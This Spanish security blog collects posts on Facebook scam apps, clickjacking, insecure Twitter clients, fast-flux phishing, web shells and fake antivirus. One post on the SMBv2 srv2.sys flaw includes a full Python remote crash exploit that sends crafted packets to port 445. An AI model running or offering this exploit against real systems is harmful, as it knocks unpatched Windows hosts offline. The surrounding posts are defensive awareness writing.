Revocar el consentimiento en proveedores de identidad

Si estás un poco preocupado por la privacidad y la seguridad en general, es posible que te hayas hecho estas preguntas en algún momento:

• ¿Qué aplicaciones o sitios web tienen acceso a mis datos personales en Facebook?
• ¿Quién puede ver mis contactos en Gmail o Windows Live/Hotmail (y enviarles correos en mi nombre)?
• ¿Quién puede publicar actualizaciones en Twitter, Facebook o Windows Live en mi nombre?

Si no eres un paranoico de la privacidad, lo más probable es que de primeras no sepas la respuesta. Puede que tengas una ligera idea de cómo llegar hasta esa información y modificarla, aunque no siempre es tan directo como podría parecer o como debería ser.

En este post vamos a resumir cómo gestionar y revocar el consentimiento que proporcionamos a aplicaciones de terceros en los proveedores de identidad más importantes. Si has caído en un engaño, están suplantando tu identidad y lo que te interesa es desactivar esa aplicación en Facebook o Twitter, puedes saltar directamente al apartado correspondiente (Facebook, Google, Windows Live ID, Twitter, Yahoo *actualización*). Si quieres entender un poco mejor cómo hemos llegado hasta aquí, sigue leyendo.
Leer más...

Y esta vez, ¿quién visita tu muro?

Si hace unas semanas publicábamos una entrada sobre las falsas aplicaciones de Facebook para saber quién visita tu perfil, parece que este fin de semana se ha puesto de moda una nueva aplicación que ofrece semejantes «beneficios».

Esta aplicación nos ofrece, supuestamente, la posibilidad de conocer quién ha visitado nuestro muro, no sin antes realizar una serie de acciones que ya son familiares en este tipo de situaciones.

Paso 1: hacer clic en unos botones "Me gusta". Al hacerlo, automáticamente, nos convertiremos en fans, o seguidores, de una serie de páginas aleatorias.

Se puede eliminar esta acción de nuestro perfil haciendo clic en el aspa que aparece en la parte derecha de cada publicación.

Además de una buena práctica que deberíamos realizar con frecuencia, especialmente en este caso, deberemos acceder a la sección de «Actividades e intereses» de nuestro perfil para ver cuáles son aquellas páginas que han aparecido sin nuestro consentimiento.

Para eliminar estas páginas se debe acceder a ellas, una por una, y hacer clic sobre la opción «Ya no me gusta» que se encuentra en la parte izquierda de la ventana.

Paso 2: Dar a conocer la aplicación en nuestro muro mediante la opción de compartir.

Paso 3: El tercer paso consiste en hacer un poco de spam en Facebook (en los muros de nuestros amigos, en los muros de otras páginas) para que todo el mundo sepa de la existencia de esta falsa aplicación y conseguir que más gente caiga en la trampa.

La solución para eliminar la publicación de nuestro muro (paso 2) y de otras páginas (paso 3) es la misma que para el paso 1: acceder a nuestro perfil y eliminar las publicaciones recientes.

Paso 4: El ultimo paso, como era de esperar, es la instalación de una aplicación que nos solicitará acceso a nuestras información personal y, en este caso, también a nuestras fotos.

Para eliminar aplicaciones de nuestro perfil, debemos acceder a la «Configuración de la privacidad» desde la opción «Cuenta» del menú de Facebook.

En la sección «Aplicaciones y sitios web» encontraremos un enlace a la sección de aplicaciones que tienen acceso a nuestros datos. Desde ahí podremos eliminar o bloquear estas aplicaciones.

Recordad que, en muchos casos, este tipo de aplicaciones utilizan la ingeniería social para obtener información privada de los usuarios ofreciendo funcionalidades falsas o inexistentes. En otros casos, estas aplicaciones están relacionadas con la descarga de programas maliciosos. ¡No caigáis en la trampa!

Las visitas al perfil de Facebook

Mucho se ha comentado acerca de los perfiles de Facebook y, sobre todo, sobre si es posible saber el número de visitas que estos tienen. Es importante que quede claro que Facebook no permite conocer el número de visitas que recibimos en nuestro perfil. Otra cuestión que conviene aclarar es que no existe el botón «No me gusta», sobre el que tanto se ha especulado.

Existen multitud de métodos que intentan engañar al usuario con estas falsas promesas. Los motivos de los creadores son diversos: obtener más fans en sus páginas de Facebook, lograr información personal, conducir a los usuarios a una aplicación fraudulenta... Uno de estos engaños se muestra a continuación.

Una recomendación básica para evitar caer en estas trampas es utilizar un alargador de URL, que mostrará información sobre el destino del enlace permitiendo ver la dirección real que ha sido acortada. Si la información reflejada parece sospechosa o no guarda relación con lo anunciado podremos optar por no seguir ese enlace.

Por lo general, aquellos usuarios de Facebook que hayan sido víctimas de alguno de estos engaños podrán ver una publicación generada de forma automática en su perfil y podrán eliminarla situándose en la parte derecha de la publicación y haciendo clic en el aspa.

Si vemos en nuestro muro este tipo de publicaciones, podemos marcarlas como spam o denunciarlas en función del tipo de contenido del que se trate.

Recordad que ni el contador de visitas ni el botón «No me gusta» existen actualmente en Facebook y, al menos por el momento, no van a existir. ¡No caigáis en la trampa!


Actualización:

No debe confundirse el enlace «Ya no me gusta» con el falso botón «No me gusta».

El enlace «Ya no me gusta» sirve para dejar de ser fan de una página sobre la que previamente hemos hecho clic en su botón de «Me gusta». El botón «No me gusta» es un botón falso que se utiliza como gancho en los engaños de falsas páginas o aplicaciones.

El tsunami de Japón, nuevo filón para los ciberdelincuentes

Una vez más, el poder de un titular con gancho y la curiosidad de los lectores están de actualidad.

Hace algún tiempo se detectó un gran número de usuarios de Facebook afectados por un clickjacking cuyo origen se encontraba en unas falsas páginas sobre suicidios.

Las noticias de actualidad siempre son una gran fuente de inspiración que aprovechan los ciberdelincuentes para obtener algún tipo de beneficio. En esta ocasión, el tsunami de Japón es el titular perfecto.

Vídeos e imágenes sobre gigantescas olas que disparan ballenas hacia los edificios son reclamos muy atractivos para lograr que los usuarios accedan al contenido anunciado.

Los usuarios que hacen clic sobre estas noticias o falsas páginas que se distribuyen por Facebook están haciendo clic sobre un botón «Me Gusta» sin saberlo. En ocasiones, serán redirigidos a páginas o encuestas que generarán un beneficio económico a los ciberdelincuentes, en otros casos, el enlace descargará un software malicioso.

Las recomendaciones para no ser víctimas de estos engaños son las habituales: no acceder a contenidos sospechosos, no descargar contenidos de dudosa procedencia, utilizar herramientas de seguridad o complementos para el navegador como NoScript.

En caso de haber accedido a alguno de estos enlaces desde Facebook, es recomendable que el usuario vaya a la vista de su perfil, desde el menú situado en la parte superior derecha de la ventana para revisar las últimas publicaciones. Si existe algún contenido que el usuario no haya creado, puede eliminarlo pinchando sobre el aspa que aparece al situarse sobre el contenido.

No se debe olvidar que la herramienta más eficaz contra contenido sospechoso es el sentido común.

Fuente: Sophos

Vigila con qué twiteas

Con toda la fiebre de twitter y la miríada de clientes que existen, cabría esperar que todo el mundo pudiese encontrar uno ajustado a sus necesidades. No obstante, un requisito tan básico como que el cliente utilice comunicaciones cifradas mediante SSL/HTTPS reduce drásticamente las opciones.

En mi cruzada en busca del cliente ideal (para Linux), he probado varias alternativas, con resultados diversos pero bastante desalentadores. Podemos dividir los clientes en tres grupos:

• HTTP+Autenticación básica
• HTTP+OAuth
• HTTPS/SSL

Los clientes que usan HTTP+autenticación básica no solo utilizan un protocolo sin cifrar para la comunicación con la API de Twitter, sino que además envían las credenciales en claro en cada petición (comprobado con un sniffer de red).
- gTwitter
- Twitbin (extensión de Firefox)
- KDETwitter Plasmoid

Hay otros clientes que, siguiendo las recomendaciones de Twitter no almacenan las credenciales ellos mismos, sino que utilizan un protocolo abierto específico de autenticación para APIs llamado OAuth, basado en tokens de seguridad. El sistema funciona más o menos así:

1. Introduces tu nombre de usuario en el cliente Twitter
2. El cliente abre un navegador para que te autentiques en Twitter si no tienes ya una sesión, con un token generado aleatoriamente. A la vez, hace una petición a la API para notificar la asociación entre ese token y la aplicación.
3. Twitter te pregunta si quieres autorizar a la aplicación a acceder a tu cuenta y enviar tweets. Respondes que sí y te proporciona un PIN.
4. Introduces el PIN en la aplicación, que ésta envía a Twitter junto con el token para comprobar que realmente el usuario es el que ha hecho la petición.
   
5. Desde ese momento, las peticiones con ese token tienen autorización para modificar tu perfil.

No obstante, al enviar el token de autenticación en claro, son vulnerables a un secuestro de sesión exactamente igual que cuando se usan cookies. Dentro de este grupo de clientes sólo he encontrado/probado uno:
- qTwitter

Los que usan HTTPS/SSL (de nuevo, siguiendo las recomendaciones de Twitter) son los únicos que pueden considerarse seguros frente al robo de credenciales y secuestro de sesión, por utilizar un protocolo cifrado para las peticiones a la API.

-Qwit
- Twitux a partir de la versión 0.69, que no está aún en los repositorios de OpenSUSE oficiales.

¿Qué cliente twitter usáis? ¿Soporta y utliza SSL por defecto? Os recomiendo poner el Wireshark y esnifar un poco, puede que os llevéis una sorpresa...

Y por supuesto, si utilizáis la propia web de Twitter, aseguraos que entráis con HTTPS...

Windows Vista/7RC/2008 Server Vulnerables a un 0Day

No íbamos a ser los únicos que no poníamos esta noticia, :)

Bueno, antes de nada explicar en que consiste el problema.

Después de revisar varios datos, y comprobar directamente en el archivo vulnerable "srv2.sys" el problema, personalmente creo que el descubridor de la vuln. no se entero muy bien.

Autor: Laurent Gaffié

URL: http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html

El fallo esta al validar la entrada del "Process Id High" que se envia en dos bytes y es usado directamente como un indice en una tabla de funciones, lo que pasa es que el limite de esta tabla no esta comprobado al usar el parámetro, por eso se puede sobrepasar este limite. El driver después de obtener la dirección de la función, salta la ejecución a la dirección devuelta.

El descubridor define que poniendo en la parte alta del parametro un "&" provoca un fallo que hace que el sistema se vuelva inestable.

El problema es cuando, por casualidad, en la dirección que devuelve al buscar el indice 0x2600 es una dirección que no provoca un problema en el sistema, por eso algunas de las pruebas realizadas no colgaban los sistemas .

Como aportación he modificado el exploit original, buscando un valor que pueda colgar el sistema.

-- init --

#!/usr/bin/python

from socket import socket
from struct import *
import sys


def checkparams():
  if len(sys.argv) != 2:
      usage()
  else:
      return sys.argv[1], 445
  return 0

def crashwin(host):
  # Searching a memory position vuln
  for i in range(0,65535):
      buff = ("\x00\x00\x00\x90"
              "\xff\x53\x4d\x42"
              "\x72\x00\x00\x00"
              "\x00\x18\x53\xc8"
              + pack('>H', i) + # Process ID High
              "\x00\x00\x00\x00\x00\x00\x00\x00"
              "\x00\x00\xff\xff\xff\xfe\x00\x00"
              "\x00\x00\x00\x6d\x00\x02\x50\x43"
              "\x20\x4e\x45\x54\x57\x4f\x52\x4b"
              "\x20\x50\x52\x4f\x47\x52\x41\x4d"
              "\x20\x31\x2e\x30\x00\x02\x4c\x41"
              "\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
              "\x02\x57\x69\x6e\x64\x6f\x77\x73"
              "\x20\x66\x6f\x72\x20\x57\x6f\x72"
              "\x6b\x67\x72\x6f\x75\x70\x73\x20"
              "\x33\x2e\x31\x61\x00\x02\x4c\x4d"
              "\x31\x2e\x32\x58\x30\x30\x32\x00"
              "\x02\x4c\x41\x4e\x4d\x41\x4e\x32"
              "\x2e\x31\x00\x02\x4e\x54\x20\x4c"
              "\x4d\x20\x30\x2e\x31\x32\x00\x02"
              "\x53\x4d\x42\x20\x32\x2e\x30\x30"
              "\x32\x00")

      print "Trying crash the machine..."

      s = socket()
      try:
          s.connect(host)
      except:
          print "Remote host not vulnerable"
          break
      sent = s.send(buff)
      s.close()
      if i > 0 and not sent:
          print "Machine crashed!!!"
          break

def headers():
  print """SMBv2 Remote DoS
Author: Juan C. Montes based in the original PoC
Discovered by: Laurent Gaffie
Vuln to validate the Process Id High in 'srv2.sys'
Systems tryed affected:
- Windows Vista x86
- Windows 7 RC x86
"""

def usage():
  print """usage: .%s """ % sys.argv[0]    

# entry point
if __name__ == '__main__':
  headers()
  host = checkparams()
  if host != 0:
      crashwin(host)

-- end --

Espero que estos datos os sirvan de algo, :)

Un saludo.

Evolucionar o morir

Está claro que solo el que sabe adaptarse sobrevive, podemos verlo en cómo está evolucionando el phishing bancario.

Usar el típico dominio fraudulento que apunta a un único servidor fraudulento cada vez se lleva menos. Bloquear una única direccion IP es una tarea rápida y sencilla... esto lo saben quienes se están lucrando con este tipo de actividades.

Últimamente se está incrementado el número de casos de ataques de phishing con Fast-Flux en dominios ".es". Usar cientos o miles de máquinas para alojar contenido fraudulento y añadir una gran cantidad de registros en el DNS de un dominio (con un reducido TTL), apuntando a todas esas máquinas, dificulta la labor de quienes deben poner solución al problema puesto que, seguramente, ya no estemos hablando de un único ISP ni una única dirección IP.

En estos casos, la única salvación de todas las víctimas potenciales es usar la cabeza y el sentido común para no morder el anzuelo, en su defecto, tendremos que confiar en la rápida actuación del Agente Registrador o la entidad gestora del dominio.

Cada dia esto va a peor

Curioso el caso que nos hemos encontrado hoy revisando un problema en un servidor que habia sido comprometido, acabamos encontrado varias shells diferentes subidas en diferentes fechas.

Esta claro que la culpa es de los "administradores", pero es mucho peor si por culpa de la configuracion puedes acceder a mas dominios dentro de tu hosting, como era el caso de hoy.

Fallos en el joomla, subieron una shell y empezaron a meter phishings, luego vinieron otros que vieron el mismo fallo y aparte de subir una shell pues aprovecharon para comprometer mas dominios, no vaya a darse alguien cuenta de las shells...

includes.php
path.php
admin.php
...

El problema de todo esto ya no es que te tomen el control de una maquina con 20 o 30 dominios, el problema es que despues en cada uno de ellos cuelgan phishing y los "usuarios" acaban palmando pasta.

Todo por que hay gente que por instalar un apache y un mysql se creen administradores de sistemas y se venden como tal. Claro esta que mucho mas baratos que gente especializada y cuando pasan estas cosas pues se andan quejando, sobretodo cuando no saben lo que es un backup.

Solo una peticion a esa gente que se hacen pasar por profesionales, pensar que pasaria si se hiciera lo mismo en otras profesiones como la medicina por ejemplo...

El timo de la e-stampita

Iniciamos nuestra incursion en el peligroso mundo de los blogs con un articulo sobre como se puede engañar a los "usuarios" con un timo de los que habia en epocas de Paco Martinez Soria.

Hablo del crecimiento de los falsos antivirus, la distribucion de supuestos antivirus o antiespias proporciona una via para no solamente hacer que un usuario pague por un software que no hace nada, si no que ademas es una forma de crear una entrada de malware a las maquinas de los "usuarios" que se crean todo lo que ven.

La verdad es que les esta bien merecido, mas de uno deberia usar el PC como pisapapeles, pero ese no es el tema de hoy.

Estos sistemas de descargas de falsos antivirus estan muy bien diseñados.

Por un lado tenemos varios dominios que nos llevan a la misma IP pero en funcion del dominio usando para acceder el antivirus que nos descargamos tiene un hash diferente.

Tienen sistemas de balanceo de carga, para asegurar que todo el mundo pueda ser infectado, :)

El siguiente esquema ha sido sacado despues del analisis de una de estas redes, las IPs son reales, por si alguno necesita un antivirus, :)





Hay que destacar que los servicios de pago usan certificados validos para dar la sensacion de seriedad.

Como os dareis cuenta, aparte de pagar por un software que no hace nada, capturan los datos de la tarjeta de credito para futuros usos.

Para finalizar os dejo una capturas interesante, de un analisis de este antivirus en su version online.
Interesante el resultado:

• Analizando hal.dll entre otros...
• Detectando archivos infectados
• Detectando que tengo la proteccion de internet explorer desactivada...

Y todo esto en mi debian, :)



Espero que os sirva de algo esta informacion.

Un saludo y hasta la proxima entrada.

Konnichiwa

Bueno, con esto empiezan las andanzas de cinco individuos en el gran mundo de los blogs.

Nos dedicamos a la seguridad informatica y de eso trataran los post... bueno... igual cae alguna receta de cocina por el medio, :)

Espero que encontreis interesantes nuestras historias y que alguna os sirva de algo en algun momento.

Un saludo y bienvenidos.